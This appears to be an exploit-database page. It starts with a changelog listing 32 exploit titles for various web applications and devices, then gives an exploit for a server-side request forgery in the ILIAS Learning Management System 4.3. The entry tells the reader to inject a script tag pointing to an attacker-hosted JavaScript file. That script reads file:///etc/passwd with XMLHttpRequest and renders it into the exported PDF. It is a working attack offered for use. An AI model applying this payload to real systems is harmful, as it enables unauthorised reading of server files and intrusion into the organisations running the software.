0ffa4d35c4
32 changes to exploits/shellcodes aSc TimeTables 2021.6.2 - Denial of Service (PoC) IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path Microsoft Windows - Win32k Elevation of Privilege Ksix Zigbee Devices - Playback Protection Bypass (PoC) Mitel mitel-cs018 - Call Data Information Disclosure Expense Management System - 'description' Stored Cross Site Scripting ILIAS Learning Management System 4.3 - SSRF Pharmacy Store Management System 1.0 - 'id' SQL Injection Under Construction Page with CPanel 1.0 - SQL injection EgavilanMedia User Registration & Login System with Admin Panel 1.0 - CSRF Student Result Management System 1.0 - Authentication Bypass SQL Injection EgavilanMedia User Registration & Login System with Admin Panel 1.0 - Stored Cross Site Scripting WonderCMS 3.1.3 - Authenticated SSRF to Remote Remote Code Execution WonderCMS 3.1.3 - Authenticated Remote Code Execution PRTG Network Monitor 20.4.63.1412 - 'maps' Stored XSS Online Voting System Project in PHP - 'username' Persistent Cross-Site Scripting NewsLister - Authenticated Persistent Cross-Site Scripting Bakeshop Online Ordering System 1.0 - 'Owner' Persistent Cross-site scripting Online News Portal System 1.0 - 'Title' Stored Cross Site Scripting Local Service Search Engine Management System 1.0 - SQLi Authentication Bypass WonderCMS 3.1.3 - 'Menu' Persistent Cross-Site Scripting Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Add Artwork Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile DotCMS 20.11 - Stored Cross-Site Scripting WebDamn User Registration & Login System with User Panel - SQLi Auth Bypass ChurchCRM 4.2.0 - CSV/Formula Injection ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS) Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality Anuko Time Tracker 1.19.23.5311 - Password Reset leading to Account Takeover Simple College Website 1.0 - 'page' Local File Inclusion Car Rental Management System 1.0 - SQL Injection / Local File include WordPress Plugin Wp-FileManager 6.8 - RCE
33 lines
No EOL
1.2 KiB
Text
33 lines
No EOL
1.2 KiB
Text
# Exploit Title: ILIAS Learning Management System 4.3 - SSRF
|
|
# Date: 10-08-2020
|
|
# Exploit Author: Dot/kx1z0
|
|
# Vendor Homepage: https://www.ilias.de/
|
|
# Software Link: https://github.com/ILIAS-eLearning/ILIAS/tree/release_4-3
|
|
# Version: 4.3-5.1
|
|
# Tested on: Linux
|
|
# Description
|
|
We can create portfolios, export them to PDF and download them.
|
|
The issue is that there is an HTML Injection, and if we inject HTML
|
|
into the portfolio, when it is exported to PDF, it will be rendered.
|
|
So we can take advantage that it is running under the wrapper file://
|
|
to inject an XMLHttpRequest requesting the local file we want, that
|
|
when downloading the PDF, we can see the content of that file
|
|
|
|
# Exploit
|
|
We cannot inject the XMLHttpRequest directly into the content of the
|
|
portfolio, as there is something blocking it. So we will have to host
|
|
a script in our own server and invoke it from the portfolio
|
|
|
|
We insert this in the portfolio:
|
|
<script src=host.com/test.js> </script>
|
|
|
|
Script in our server:
|
|
x=new XMLHttpRequest;
|
|
x.onload=function(){
|
|
document.write(this.responseText)
|
|
};
|
|
x.open("GET","file:///etc/passwd");
|
|
x.send();
|
|
|
|
So, finally, we will only have to download the PDF and there, will be
|
|
the content of the file we have requested. |